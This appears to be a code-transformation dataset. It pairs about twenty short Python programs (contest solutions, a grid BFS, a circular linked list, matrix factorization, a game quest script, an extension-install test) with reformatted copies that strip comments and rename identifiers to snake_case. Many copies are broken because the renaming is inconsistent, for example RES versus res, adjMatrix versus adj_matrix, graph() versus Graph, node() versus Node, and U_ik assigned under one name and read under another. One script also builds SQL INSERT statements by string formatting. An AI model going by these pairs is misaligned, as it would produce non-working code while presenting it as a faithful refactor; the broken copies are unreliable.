N = int(input()) RES = {} def result(n, m, k): if (n, m, k) in RES: return RES[n, m, k] else: RES[n, m, k] = _result(n, m, k) return RES[n, m, k] def _result(n, m, k): if n == 0: return 1 else: s = 0 for l in range(1, n + 1): if (l - m) % k == 0: continue s += result(n - l, m, k) return s for i in range(N): K, n, m, k = map(int, input().split()) print(K, result(n, m, k))
n = int(input()) res = {} def result(n, m, k): if (n, m, k) in RES: return RES[n, m, k] else: RES[n, m, k] = _result(n, m, k) return RES[n, m, k] def _result(n, m, k): if n == 0: return 1 else: s = 0 for l in range(1, n + 1): if (l - m) % k == 0: continue s += result(n - l, m, k) return s for i in range(N): (k, n, m, k) = map(int, input().split()) print(K, result(n, m, k))
#!/usr/bin/python IMAGE_RESOLUTION = (640, 480) IMAGE_BYTE_SIZE = IMAGE_RESOLUTION[0] * IMAGE_RESOLUTION[1] * 3 GRAYSCALE_IMAGE_BYTE_SIZE = IMAGE_RESOLUTION[0] * IMAGE_RESOLUTION[1] IMAGE_DATA_SERVICE = 3380 DISCOVER_CAMERA_SERVICE = 3070 CAMERA_SERVICE = 3070 SERVICE_DISCOVER_REQUEST_HEADER = "WHERE_IS_" GRAY_SCALE_IMAGE_TYPE = 0 COLOR_IMAGE_TYPE = 1
image_resolution = (640, 480) image_byte_size = IMAGE_RESOLUTION[0] * IMAGE_RESOLUTION[1] * 3 grayscale_image_byte_size = IMAGE_RESOLUTION[0] * IMAGE_RESOLUTION[1] image_data_service = 3380 discover_camera_service = 3070 camera_service = 3070 service_discover_request_header = 'WHERE_IS_' gray_scale_image_type = 0 color_image_type = 1
class graph: def __init__(self): self.vertices = {} self.depth = {} def add_node(self,myid): if myid in self.vertices: print("Node already added") else: self.vertices[myid] = set() self.depth[myid] = 0 def add_edge(self,id1,id2): self.vertices[id1].add(id2) self.vertices[id2].add(id1) def show_graph(self): for key in self.vertices: print(str(key)+" : " + str(self.vertices[key])) def bfs(self,root): queue = [root] visited = set() seq = [] while queue: curr = queue.pop(0) if curr not in visited: # print('next Element is '+str(curr)) seq.append(curr) visited.add(curr) # print(self.vertices[curr]) # print(visited) for k in self.vertices[curr] - visited: if k not in queue: queue.append(k) self.depth[k] = self.depth[curr]+1 # print(queue) return seq #no of edges m,n=map(int,input().split()) x,y=map(int,input().split()) x = x-1 y = y-1 adjMatrix = [[0 for i in range(m)] for k in range(m)] def checkValid(i,j): if i < 0 or i >= m: return False if j < 0 or j >= n: return False if adjMatrix[i][j] == 'T': return True else: return False def getId(i,j): return n*i + j g = graph() # print(adjMatrix) for i in range(m): adjMatrix[i]=input().split() for i in range(m): for j in range(n): if adjMatrix[i][j] == 'T': g.add_node(getId(i,j)) for i in range(m): for j in range(n): if adjMatrix[i][j] == 'T': #check nw if checkValid(i-1,j-1): g.add_edge(getId(i,j),getId(i-1,j-1)) #check n if checkValid(i-1,j): g.add_edge(getId(i,j),getId(i-1,j)) #check ne if checkValid(i-1,j+1): g.add_edge(getId(i,j),getId(i-1,j+1)) #check e if checkValid(i,j+1): g.add_edge(getId(i,j),getId(i,j+1)) #check se if checkValid(i+1,j+1): g.add_edge(getId(i,j),getId(i+1,j+1)) #check s if checkValid(i+1,j): g.add_edge(getId(i,j),getId(i+1,j)) #check sw if checkValid(i+1,j-1): g.add_edge(getId(i,j),getId(i+1,j-1)) #check e if checkValid(i,j-1): g.add_edge(getId(i,j),getId(i,j-1)) # print(g.vertices) # print(getId(x,y)) g.bfs(getId(x,y)) # print(g.depth) print(g.depth[max(g.depth)]+1)
class Graph: def __init__(self): self.vertices = {} self.depth = {} def add_node(self, myid): if myid in self.vertices: print('Node already added') else: self.vertices[myid] = set() self.depth[myid] = 0 def add_edge(self, id1, id2): self.vertices[id1].add(id2) self.vertices[id2].add(id1) def show_graph(self): for key in self.vertices: print(str(key) + ' : ' + str(self.vertices[key])) def bfs(self, root): queue = [root] visited = set() seq = [] while queue: curr = queue.pop(0) if curr not in visited: seq.append(curr) visited.add(curr) for k in self.vertices[curr] - visited: if k not in queue: queue.append(k) self.depth[k] = self.depth[curr] + 1 return seq (m, n) = map(int, input().split()) (x, y) = map(int, input().split()) x = x - 1 y = y - 1 adj_matrix = [[0 for i in range(m)] for k in range(m)] def check_valid(i, j): if i < 0 or i >= m: return False if j < 0 or j >= n: return False if adjMatrix[i][j] == 'T': return True else: return False def get_id(i, j): return n * i + j g = graph() for i in range(m): adjMatrix[i] = input().split() for i in range(m): for j in range(n): if adjMatrix[i][j] == 'T': g.add_node(get_id(i, j)) for i in range(m): for j in range(n): if adjMatrix[i][j] == 'T': if check_valid(i - 1, j - 1): g.add_edge(get_id(i, j), get_id(i - 1, j - 1)) if check_valid(i - 1, j): g.add_edge(get_id(i, j), get_id(i - 1, j)) if check_valid(i - 1, j + 1): g.add_edge(get_id(i, j), get_id(i - 1, j + 1)) if check_valid(i, j + 1): g.add_edge(get_id(i, j), get_id(i, j + 1)) if check_valid(i + 1, j + 1): g.add_edge(get_id(i, j), get_id(i + 1, j + 1)) if check_valid(i + 1, j): g.add_edge(get_id(i, j), get_id(i + 1, j)) if check_valid(i + 1, j - 1): g.add_edge(get_id(i, j), get_id(i + 1, j - 1)) if check_valid(i, j - 1): g.add_edge(get_id(i, j), get_id(i, j - 1)) g.bfs(get_id(x, y)) print(g.depth[max(g.depth)] + 1)
{ "includes": ["common.gypi"], "targets": [{ "target_name": "test-runner", "type": "executable", "include_dirs": ["deps/bandit", "test"], "includes": ["slimsig.gypi"], "sources": [ "test/test.cpp", # for ease of development "include/slimsig/slimsig.h", "include/slimsig/tracked_connect.h", "include/slimsig/detail/signal_base.h", "include/slimsig/connection.h", "include/slimsig/detail/slot.h", "slimsig.gyp", "slimsig.gypi", "common.gypi"] }, { "target_name": "benchmark", "type": "executable", "include_dirs": ["benchmark", "include"], "includes": ["slimsig.gypi"], "sources": ["benchmark/benchmark.cpp"] }, { "target_name": "benchmark-boost", "type": "executable", "include_dirs": ["benchmark", "include", "/usr/local/include/"], "includes": ["slimsig.gypi"], "sources": ["benchmark/benchmark-boost.cpp"] }] }
{'includes': ['common.gypi'], 'targets': [{'target_name': 'test-runner', 'type': 'executable', 'include_dirs': ['deps/bandit', 'test'], 'includes': ['slimsig.gypi'], 'sources': ['test/test.cpp', 'include/slimsig/slimsig.h', 'include/slimsig/tracked_connect.h', 'include/slimsig/detail/signal_base.h', 'include/slimsig/connection.h', 'include/slimsig/detail/slot.h', 'slimsig.gyp', 'slimsig.gypi', 'common.gypi']}, {'target_name': 'benchmark', 'type': 'executable', 'include_dirs': ['benchmark', 'include'], 'includes': ['slimsig.gypi'], 'sources': ['benchmark/benchmark.cpp']}, {'target_name': 'benchmark-boost', 'type': 'executable', 'include_dirs': ['benchmark', 'include', '/usr/local/include/'], 'includes': ['slimsig.gypi'], 'sources': ['benchmark/benchmark-boost.cpp']}]}
# Converts lines in a csv file into sql statements file_path="C:/Users/MMZ/code/sample_python/csv-list.csv" output_path="C:/Users/MMZ/code/sample_python/sql_stats.sql" output_file = open(output_path, "w") with open(file_path,"r") as mfile: for row in mfile: # Parse each line in the CSV file as a row #Only format if row is not a new line if(row != "\n"): #strings are immutable, lower() returns a new string so print(row) returns unchanged string new_string=row.lower() #Split the items in the row and strip leading&trailing whitespace details_list=new_string.split(",") food=details_list[0].strip() weight=details_list[1].strip() calories=details_list[2].strip() # sql statement # %s replaced with values from a tuple after % operator sql_insert = "insert into food (name,food_weight, food_calories) values ('%s','%s','%s')" % (food,weight,calories) #write insert sql statements to a file output_file.write(sql_insert + '\n') mfile.close() output_file.close()
file_path = 'C:/Users/MMZ/code/sample_python/csv-list.csv' output_path = 'C:/Users/MMZ/code/sample_python/sql_stats.sql' output_file = open(output_path, 'w') with open(file_path, 'r') as mfile: for row in mfile: if row != '\n': new_string = row.lower() details_list = new_string.split(',') food = details_list[0].strip() weight = details_list[1].strip() calories = details_list[2].strip() sql_insert = "insert into food (name,food_weight, food_calories) values ('%s','%s','%s')" % (food, weight, calories) output_file.write(sql_insert + '\n') mfile.close() output_file.close()
def wait_for_enter(): input('Press [Enter] to continue... ') print() def print_with_step(context: dict, msg: str): print(f"{context['step_no']}. {msg}") def input_with_step(context: dict, msg: str) -> str: return input(f"{context['step_no']}. {msg}") class NameProjectStep(object): @staticmethod def run(context: dict): context['project_name'] = input_with_step(context, "What's the name of the project? ") print() class CreateGithubRepoStep(object): @staticmethod def run(context: dict): print_with_step(context, f"Create a new repository on Github named '{context['project_name']}'.") print(' - Initialize it with a README and a LICENSE') print(' - Copy the clone URL to the clipboard') wait_for_enter() class CloneRepoStep(object): @staticmethod def run(context: dict): print_with_step(context, f"Clone the repo into dev/projects/{context['project_name']}.") wait_for_enter() class GenerateGitignoreStep(object): @staticmethod def run(context: dict): print_with_step(context, 'Navigate to https://gitignore.io and generate a .gitignore') print(f" - Add the file to the {context['project_name']} directory.") wait_for_enter() def start_new_project(): context = dict(step_no=1) steps = [ NameProjectStep(), CreateGithubRepoStep(), CloneRepoStep(), GenerateGitignoreStep(), ] print(f'There are {len(steps)} steps to start a new project. Ready? Go!\n') for step in steps: step.run(context) context['step_no'] += 1 print('Done!') if __name__ == "__main__": start_new_project()
def wait_for_enter(): input('Press [Enter] to continue... ') print() def print_with_step(context: dict, msg: str): print(f"{context['step_no']}. {msg}") def input_with_step(context: dict, msg: str) -> str: return input(f"{context['step_no']}. {msg}") class Nameprojectstep(object): @staticmethod def run(context: dict): context['project_name'] = input_with_step(context, "What's the name of the project? ") print() class Creategithubrepostep(object): @staticmethod def run(context: dict): print_with_step(context, f"Create a new repository on Github named '{context['project_name']}'.") print(' - Initialize it with a README and a LICENSE') print(' - Copy the clone URL to the clipboard') wait_for_enter() class Clonerepostep(object): @staticmethod def run(context: dict): print_with_step(context, f"Clone the repo into dev/projects/{context['project_name']}.") wait_for_enter() class Generategitignorestep(object): @staticmethod def run(context: dict): print_with_step(context, 'Navigate to https://gitignore.io and generate a .gitignore') print(f" - Add the file to the {context['project_name']} directory.") wait_for_enter() def start_new_project(): context = dict(step_no=1) steps = [name_project_step(), create_github_repo_step(), clone_repo_step(), generate_gitignore_step()] print(f'There are {len(steps)} steps to start a new project. Ready? Go!\n') for step in steps: step.run(context) context['step_no'] += 1 print('Done!') if __name__ == '__main__': start_new_project()
class Trainer(object): name = "" team = "" fav = "" caught_pokemon = "" def __init__(self, name): self.name = name
class Trainer(object): name = '' team = '' fav = '' caught_pokemon = '' def __init__(self, name): self.name = name
def plot_polynomial(file, function, p_x, x=None, formula=""): pass def plot_regression(file, x, y, prediction, groundtruth): pass
def plot_polynomial(file, function, p_x, x=None, formula=''): pass def plot_regression(file, x, y, prediction, groundtruth): pass
class Node: def __init__(self,data): self.data = data self.next = None def printlist( head): temp = head res = [] while(True) : res.append(f"{temp.data}") temp = temp.next if (temp == head): break return "-->".join(res) def deleteNode( head, key) : if (head == None): return # If the list contains only a single node if((head).data == key and (head).next == head): head = None last = head d = None # If head is to be deleted if((head).data == key) : # Find the last node of the list while(last.next != head): last = last.next # Point last node to the next of head i.e. the second node of the list last.next = head.next head = last.next # Either the node to be deleted is not found or the end of list is not reached while(last.next != head and last.next.data != key) : last = last.next # If node to be deleted was found if(last.next.data == key) : d = last.next last.next = d.next else: return -1 return head ## Driver code..!!! if __name__ == "__main__": head = Node(5) head.next = Node(4) head.next.next = Node(3) head.next.next.next = Node(2) head.next.next.next.next = head print("before deletion",printlist(head)) head = deleteNode( head, 3) print("after deletion",printlist(head))
class Node: def __init__(self, data): self.data = data self.next = None def printlist(head): temp = head res = [] while True: res.append(f'{temp.data}') temp = temp.next if temp == head: break return '-->'.join(res) def delete_node(head, key): if head == None: return if head.data == key and head.next == head: head = None last = head d = None if head.data == key: while last.next != head: last = last.next last.next = head.next head = last.next while last.next != head and last.next.data != key: last = last.next if last.next.data == key: d = last.next last.next = d.next else: return -1 return head if __name__ == '__main__': head = node(5) head.next = node(4) head.next.next = node(3) head.next.next.next = node(2) head.next.next.next.next = head print('before deletion', printlist(head)) head = delete_node(head, 3) print('after deletion', printlist(head))
def isGood(listA, listB, k): n = len(listA) listA.sort() listB.sort(reverse=True) for i in range(n): if listA[i]+listB[i] < k: return False return True T = int(input().strip()) for i in range(T): [n, k] = [int(x) for x in input().strip().split()] listA = [int(x) for x in input().strip().split()] listB = [int(x) for x in input().strip().split()] if isGood(listA, listB, k): print("YES") else: print("NO")
def is_good(listA, listB, k): n = len(listA) listA.sort() listB.sort(reverse=True) for i in range(n): if listA[i] + listB[i] < k: return False return True t = int(input().strip()) for i in range(T): [n, k] = [int(x) for x in input().strip().split()] list_a = [int(x) for x in input().strip().split()] list_b = [int(x) for x in input().strip().split()] if is_good(listA, listB, k): print('YES') else: print('NO')
#Similar to arrays in JS #Indexed starting in 0 ninjas = ['Ryu', 'Scorpion', 'Ibuki'] my_list = ['4', ['list', 'in', 'a', 'list'], 987] empty_list = [] # In Python, the elements of a list do not have to be of the same data type fruits = ['apple', 'banana', 'orange', 'strawberry'] vegetables = ['lettuce', 'cucumber', 'carrots'] fruits_and_vegetables = fruits + vegetables print(fruits_and_vegetables) salad = 3 * vegetables print(salad) # accessing values drawer = ['documents', 'envelopes', 'pens'] #access the drawer with index of 0 and print value print(drawer[0]) #prints documents #access the drawer with index of 1 and print value print(drawer[1]) #prints envelopes #access the drawer with index of 2 and print value print(drawer[2]) #prints pens # manipulating lists x = [1,2,3,4,5] x.append(99) print(x) # Python uses [ ] characters to return a copy of the list, constrained to the specified indices x = [99,4,2,5,-3] print(x[:]) #the output would be [99,4,2,5,-3] print(x[1:]) #the output would be [4,2,5,-3]; print(x[:4]) #the output would be [99,4,2,5] print(x[2:4]) #the output would be [2,5]; # list built in functions # len(sequence): Returns the number of items in a sequence. my_list = [1, 'Zen', 'hi'] print(len(my_list)) #list.append(value) my_list = [1,5,2,8,4] my_list.append(7) print(my_list) # output: # [1,5,2,8,4,7] # enumerate(sequence) used in a for loop context to return two-item-tuple for each item in the list indicating the index followed by the value at that index. # map(function, sequence) applies the function to every item in the sequence you pass in. Returns a list of the results. # min(sequence) returns the lowest value in a sequence. # sorted(sequence) returns a sorted sequence
ninjas = ['Ryu', 'Scorpion', 'Ibuki'] my_list = ['4', ['list', 'in', 'a', 'list'], 987] empty_list = [] fruits = ['apple', 'banana', 'orange', 'strawberry'] vegetables = ['lettuce', 'cucumber', 'carrots'] fruits_and_vegetables = fruits + vegetables print(fruits_and_vegetables) salad = 3 * vegetables print(salad) drawer = ['documents', 'envelopes', 'pens'] print(drawer[0]) print(drawer[1]) print(drawer[2]) x = [1, 2, 3, 4, 5] x.append(99) print(x) x = [99, 4, 2, 5, -3] print(x[:]) print(x[1:]) print(x[:4]) print(x[2:4]) my_list = [1, 'Zen', 'hi'] print(len(my_list)) my_list = [1, 5, 2, 8, 4] my_list.append(7) print(my_list)
def missingWords(s, t): s = s.split(" ") t = t.split(" ") n = len(s) m = len(t) p_s = 0 p_t = 0 res = [] while p_t < m: while t[p_t] != s[p_s]: res.append(s[p_s]) p_s += 1 p_t += 1 while p_s < n: res.append(s[p_s]) p_s += 1 return res
def missing_words(s, t): s = s.split(' ') t = t.split(' ') n = len(s) m = len(t) p_s = 0 p_t = 0 res = [] while p_t < m: while t[p_t] != s[p_s]: res.append(s[p_s]) p_s += 1 p_t += 1 while p_s < n: res.append(s[p_s]) p_s += 1 return res
# Created by MechAviv # Quest ID :: 34938 # Not coded yet sm.setSpeakerID(3001500) sm.setSpeakerType(3) sm.removeEscapeButton() sm.flipDialogue() sm.setBoxChat() sm.boxChatPlayerAsSpeaker() sm.setBoxOverrideSpeaker() sm.flipBoxChat() sm.flipBoxChatPlayerAsSpeaker() sm.setColor(1) sm.sendNext("#face5#All right, I'll be the bait. You all defend, okay?") sm.setSpeakerID(3001500) sm.setSpeakerType(3) sm.removeEscapeButton() sm.flipDialogue() sm.setBoxChat() sm.boxChatPlayerAsSpeaker() sm.setBoxOverrideSpeaker() sm.flipBoxChat() sm.flipBoxChatPlayerAsSpeaker() sm.setColor(1) sm.sendSay("#face8#We have to stay strong for as long as it takes Ferret to get that thing going.") sm.setSpeakerID(3001500) sm.removeEscapeButton() sm.flipDialogue() sm.setBoxChat() sm.boxChatPlayerAsSpeaker() sm.setBoxOverrideSpeaker() sm.flipBoxChat() sm.flipBoxChatPlayerAsSpeaker() sm.setColor(1) if sm.sendAskAccept("#face5#It'll take everything we've got, but we can do it. Let's go."): # [CLEAR_ANNOUNCED_QUEST] [] sm.systemMessage("Defend the refuge from the Specter forces.") # Unhandled Message [47] Packet: 2F 01 00 00 00 59 03 04 00 00 00 00 00 07 01 00 00 01 02 70 59 25 74 8B D6 D4 01 14 00 71 75 65 73 74 5F 73 74 61 74 65 5F 63 68 61 6E 67 65 3D 31 sm.warp(940205100, 0)
sm.setSpeakerID(3001500) sm.setSpeakerType(3) sm.removeEscapeButton() sm.flipDialogue() sm.setBoxChat() sm.boxChatPlayerAsSpeaker() sm.setBoxOverrideSpeaker() sm.flipBoxChat() sm.flipBoxChatPlayerAsSpeaker() sm.setColor(1) sm.sendNext("#face5#All right, I'll be the bait. You all defend, okay?") sm.setSpeakerID(3001500) sm.setSpeakerType(3) sm.removeEscapeButton() sm.flipDialogue() sm.setBoxChat() sm.boxChatPlayerAsSpeaker() sm.setBoxOverrideSpeaker() sm.flipBoxChat() sm.flipBoxChatPlayerAsSpeaker() sm.setColor(1) sm.sendSay('#face8#We have to stay strong for as long as it takes Ferret to get that thing going.') sm.setSpeakerID(3001500) sm.removeEscapeButton() sm.flipDialogue() sm.setBoxChat() sm.boxChatPlayerAsSpeaker() sm.setBoxOverrideSpeaker() sm.flipBoxChat() sm.flipBoxChatPlayerAsSpeaker() sm.setColor(1) if sm.sendAskAccept("#face5#It'll take everything we've got, but we can do it. Let's go."): sm.systemMessage('Defend the refuge from the Specter forces.') sm.warp(940205100, 0)
def check_extension(installed): def check(document): tr_item = document.find("tr", attrs={ "class": "item" }) td_name = tr_item.find("td", attrs={ "class": "name" }) testing.expect.check("Extension:", td_name.string) td_value = tr_item.find("td", attrs={ "class": "value" }) span_name = td_value.find("span", attrs={ "class": "name" }) testing.expect.check("TestExtension", span_name.contents[0].string) testing.expect.check(" hosted by Alice von Testing", span_name.contents[1]) span_installed = td_value.find("span", attrs={ "class": "installed" }) if installed: testing.expect.check(" [installed]", span_installed.string) elif span_installed: testing.expect.check("<no installed indicator>", "<found installed indicator>") return check try: instance.execute( ["sudo", "mkdir", "~alice/CriticExtensions", "&&", "sudo", "cp", "-R", "~/critic/testing/input/TestExtension", "~alice/CriticExtensions", "&&", "sudo", "chown", "-R", "alice.critic", "~alice/CriticExtensions", "&&", "sudo", "chmod", "-R", "u+rwX,go+rX", "~alice/CriticExtensions"]) instance.execute( ["sudo", "-H", "-u", "alice", "git", "init", "&&", "sudo", "-H", "-u", "alice", "git", "add", ".", "&&", "sudo", "-H", "-u", "alice", "git", "commit", "-mInitial", "&&", "sudo", "-H", "-u", "alice", "git", "checkout", "-b", "version/stable", "&&", "sudo", "su", "-c", "'echo stable:1 > version.txt'", "alice", "&&", "sudo", "-H", "-u", "alice", "git", "add", "version.txt", "&&", "sudo", "-H", "-u", "alice", "git", "commit", "-mStable:1", "&&", "sudo", "su", "-c", "'echo stable:2 > version.txt'", "alice", "&&", "sudo", "-H", "-u", "alice", "git", "commit", "-mStable:2", "version.txt", "&&", "sudo", "-H", "-u", "alice", "git", "checkout", "master", "&&", "sudo", "su", "-c", "'echo live > version.txt'", "alice"], cwd="~alice/CriticExtensions/TestExtension") except testing.InstanceError as error: raise testing.TestFailure(error.message) with frontend.signin("alice"): frontend.page( "manageextensions", expect={ "test_extension": check_extension(False) }) frontend.operation( "installextension", data={ "author_name": "alice", "extension_name": "TestExtension" }) frontend.page( "manageextensions", expect={ "test_extension": check_extension(True) }) frontend.page( "manageextensions", expect={ "test_extension": check_extension(False) })
def check_extension(installed): def check(document): tr_item = document.find('tr', attrs={'class': 'item'}) td_name = tr_item.find('td', attrs={'class': 'name'}) testing.expect.check('Extension:', td_name.string) td_value = tr_item.find('td', attrs={'class': 'value'}) span_name = td_value.find('span', attrs={'class': 'name'}) testing.expect.check('TestExtension', span_name.contents[0].string) testing.expect.check(' hosted by Alice von Testing', span_name.contents[1]) span_installed = td_value.find('span', attrs={'class': 'installed'}) if installed: testing.expect.check(' [installed]', span_installed.string) elif span_installed: testing.expect.check('<no installed indicator>', '<found installed indicator>') return check try: instance.execute(['sudo', 'mkdir', '~alice/CriticExtensions', '&&', 'sudo', 'cp', '-R', '~/critic/testing/input/TestExtension', '~alice/CriticExtensions', '&&', 'sudo', 'chown', '-R', 'alice.critic', '~alice/CriticExtensions', '&&', 'sudo', 'chmod', '-R', 'u+rwX,go+rX', '~alice/CriticExtensions']) instance.execute(['sudo', '-H', '-u', 'alice', 'git', 'init', '&&', 'sudo', '-H', '-u', 'alice', 'git', 'add', '.', '&&', 'sudo', '-H', '-u', 'alice', 'git', 'commit', '-mInitial', '&&', 'sudo', '-H', '-u', 'alice', 'git', 'checkout', '-b', 'version/stable', '&&', 'sudo', 'su', '-c', "'echo stable:1 > version.txt'", 'alice', '&&', 'sudo', '-H', '-u', 'alice', 'git', 'add', 'version.txt', '&&', 'sudo', '-H', '-u', 'alice', 'git', 'commit', '-mStable:1', '&&', 'sudo', 'su', '-c', "'echo stable:2 > version.txt'", 'alice', '&&', 'sudo', '-H', '-u', 'alice', 'git', 'commit', '-mStable:2', 'version.txt', '&&', 'sudo', '-H', '-u', 'alice', 'git', 'checkout', 'master', '&&', 'sudo', 'su', '-c', "'echo live > version.txt'", 'alice'], cwd='~alice/CriticExtensions/TestExtension') except testing.InstanceError as error: raise testing.TestFailure(error.message) with frontend.signin('alice'): frontend.page('manageextensions', expect={'test_extension': check_extension(False)}) frontend.operation('installextension', data={'author_name': 'alice', 'extension_name': 'TestExtension'}) frontend.page('manageextensions', expect={'test_extension': check_extension(True)}) frontend.page('manageextensions', expect={'test_extension': check_extension(False)})
h, w, n=map(int, input().split()) n-=1 if n%2==1: ans=(n-1)*w/2 else: n+=1 ans=0 i=1 while i<n: ans+=i i+=2 ans=ans*w/n*2 print(ans)
(h, w, n) = map(int, input().split()) n -= 1 if n % 2 == 1: ans = (n - 1) * w / 2 else: n += 1 ans = 0 i = 1 while i < n: ans += i i += 2 ans = ans * w / n * 2 print(ans)
# One Away # O(n): AAG def OneAway(s1, s2): '''To Check If One String IS One Edit Away From Another Where Edit Can Be: Insert, Remove Or Replace ''' l1,l2 = len(s1),len(s2) if(l1==l2): return( sum([1 for i,j in zip(s1,s2) if i!=j]) <= 1) elif abs(l1-l2)==1: s1,s2 = (s1,s2) if l1>l2 else (s2,s1) count=i=j=0 while i<len(s1) and j<len(s2): if s1[i]==s2[j]: i+=1 j+=1 continue count+=1 i+=1 return(count <= 1) return False if __name__=='__main__': s1,s2 = input().split() ans = OneAway(s1, s2) print(ans) ''' Output abcde abde True '''
def one_away(s1, s2): """To Check If One String IS One Edit Away From Another Where Edit Can Be: Insert, Remove Or Replace """ (l1, l2) = (len(s1), len(s2)) if l1 == l2: return sum([1 for (i, j) in zip(s1, s2) if i != j]) <= 1 elif abs(l1 - l2) == 1: (s1, s2) = (s1, s2) if l1 > l2 else (s2, s1) count = i = j = 0 while i < len(s1) and j < len(s2): if s1[i] == s2[j]: i += 1 j += 1 continue count += 1 i += 1 return count <= 1 return False if __name__ == '__main__': (s1, s2) = input().split() ans = one_away(s1, s2) print(ans) ' Output\nabcde abde \nTrue\n'
"A simple set of tests" def testTrue(): "Thruth-iness test" assert True == 1 def testFalse(): "Fact-brication test" assert False == 0
"""A simple set of tests""" def test_true(): """Thruth-iness test""" assert True == 1 def test_false(): """Fact-brication test""" assert False == 0
class MatrixFactorization(object): def __init__(self, data, K): ''' Arguments: - data : 2 dimensional rating matrix - K : number of latent dimensions ''' self.R = np.matrix(data) self.D = np.zeros( self.R.shape ) self.K = K # User and Product biases self.b = np.nanmean(self.R) self.u_b = np.zeros( self.R.shape[0] ) self.p_b = np.zeros( self.R.shape[1] ) # User and Product matrix self.U = np.random.uniform( size=(self.R.shape[0], K) ) self.P = np.random.uniform( size=(K, self.R.shape[1]) ) def _compure_error(self): self.D = (self.R - self.estimate_all()) return self.D def train(self, alpha=0.1, beta=0.02, iterations=1000): ''' Arguments: - alpha : learning-rate - beta : regularization-rate ''' for _ in range(iterations): self._compure_error() for i in range(self.R.shape[0]): for j in range(self.R.shape[1]): for k in range(self.K): #update User and Product matrix U_ik = alpha * ( self.P[k, j] * self.D[i, j] - beta * self.U[i, k]) P_kj = alpha * ( self.U[i, k] * self.D[i, j] - beta * self.P[k, j]) if np.isfinite(U_ik): self.U[i, k] += U_ik if np.isfinite(P_kj): self.P[k, j] += P_kj #update User and Product biases Ub_i = alpha * ( self.D[i, j] - beta * self.u_b[i] ) Pb_j = alpha * ( self.D[i, j] - beta * self.p_b[j] ) if np.isfinite(Ub_i): self.u_b[i] += Ub_i if np.isfinite(Pb_j): self.p_b[j] += Pb_j return np.nansum(np.nansum(abs(self._compure_error()))) def estimate_all(self): return self.U.dot(self.P) + self.b + self.u_b[:, np.newaxis] + self.p_b[np.newaxis, :] def estimate(self, x, y): return self.U[x, :].dot(self.P[:, y]) + self.b + self.u_b[x] + self.p_b[y]
class Matrixfactorization(object): def __init__(self, data, K): """ Arguments: - data : 2 dimensional rating matrix - K : number of latent dimensions """ self.R = np.matrix(data) self.D = np.zeros(self.R.shape) self.K = K self.b = np.nanmean(self.R) self.u_b = np.zeros(self.R.shape[0]) self.p_b = np.zeros(self.R.shape[1]) self.U = np.random.uniform(size=(self.R.shape[0], K)) self.P = np.random.uniform(size=(K, self.R.shape[1])) def _compure_error(self): self.D = self.R - self.estimate_all() return self.D def train(self, alpha=0.1, beta=0.02, iterations=1000): """ Arguments: - alpha : learning-rate - beta : regularization-rate """ for _ in range(iterations): self._compure_error() for i in range(self.R.shape[0]): for j in range(self.R.shape[1]): for k in range(self.K): u_ik = alpha * (self.P[k, j] * self.D[i, j] - beta * self.U[i, k]) p_kj = alpha * (self.U[i, k] * self.D[i, j] - beta * self.P[k, j]) if np.isfinite(U_ik): self.U[i, k] += U_ik if np.isfinite(P_kj): self.P[k, j] += P_kj ub_i = alpha * (self.D[i, j] - beta * self.u_b[i]) pb_j = alpha * (self.D[i, j] - beta * self.p_b[j]) if np.isfinite(Ub_i): self.u_b[i] += Ub_i if np.isfinite(Pb_j): self.p_b[j] += Pb_j return np.nansum(np.nansum(abs(self._compure_error()))) def estimate_all(self): return self.U.dot(self.P) + self.b + self.u_b[:, np.newaxis] + self.p_b[np.newaxis, :] def estimate(self, x, y): return self.U[x, :].dot(self.P[:, y]) + self.b + self.u_b[x] + self.p_b[y]
class Url(object): def __init__(self, url, obj, name=None, namespace=None, namespace_descr=''): self.url = url self.obj = obj self.__name = name self.namespace = namespace self.namespace_descr = namespace_descr @property def name(self): return self.__name @property def endpoint(self): if self.name is None: raise(Exception("name attr is not defined!")) ns = self.namespace is not None and "%s:" % self.namespace or '' return "%s%s" % (ns, self.name) def make_urls(*namespases): urls = [] for url in namespases: if isinstance(url.obj, (list, tuple)): for url_ in url.obj: url_[0].url = '%s%s' % (url.url, url_[0].url) url_[1] = url_[0].url urls += list(url.obj) continue ## as_view: as_view = url.obj.__class__.__name__ == 'function' and True or False endpoint = url.obj.options.pop('endpoint', None) if endpoint is None: try: endpoint = url.endpoint except: if as_view: endpoint = url.obj.__name__ else: endpoint = url.obj.__class__.__name__ def_ = as_view and url.obj or url.obj.prepare urls.append([url, url.url, endpoint, def_, url.obj.options]) return urls def include(namespases, namespace=None, description=None, **kwargs): for ns in namespases: url = ns[0] url.namespace = namespace url.namespace_descr = description or namespace.upper() or '' try: ns[2] = url.endpoint except: pass return namespases
class Url(object): def __init__(self, url, obj, name=None, namespace=None, namespace_descr=''): self.url = url self.obj = obj self.__name = name self.namespace = namespace self.namespace_descr = namespace_descr @property def name(self): return self.__name @property def endpoint(self): if self.name is None: raise exception('name attr is not defined!') ns = self.namespace is not None and '%s:' % self.namespace or '' return '%s%s' % (ns, self.name) def make_urls(*namespases): urls = [] for url in namespases: if isinstance(url.obj, (list, tuple)): for url_ in url.obj: url_[0].url = '%s%s' % (url.url, url_[0].url) url_[1] = url_[0].url urls += list(url.obj) continue as_view = url.obj.__class__.__name__ == 'function' and True or False endpoint = url.obj.options.pop('endpoint', None) if endpoint is None: try: endpoint = url.endpoint except: if as_view: endpoint = url.obj.__name__ else: endpoint = url.obj.__class__.__name__ def_ = as_view and url.obj or url.obj.prepare urls.append([url, url.url, endpoint, def_, url.obj.options]) return urls def include(namespases, namespace=None, description=None, **kwargs): for ns in namespases: url = ns[0] url.namespace = namespace url.namespace_descr = description or namespace.upper() or '' try: ns[2] = url.endpoint except: pass return namespases
# !/usr/bin/env python3 # Author: C.K # Email: theck17@163.com # DateTime:2021-09-12 11:58:12 # Description: class Solution: def reverseWords(self, s: str) -> str: word = "" words = "" s = s[::-1] for j, i in enumerate(s): if i != " " and word != "" and s[j - 1] == " ": words += (word + " ") word = i elif i != " ": word = i + word else: continue words += word return (words) if __name__ == "__main__": pass
class Solution: def reverse_words(self, s: str) -> str: word = '' words = '' s = s[::-1] for (j, i) in enumerate(s): if i != ' ' and word != '' and (s[j - 1] == ' '): words += word + ' ' word = i elif i != ' ': word = i + word else: continue words += word return words if __name__ == '__main__': pass
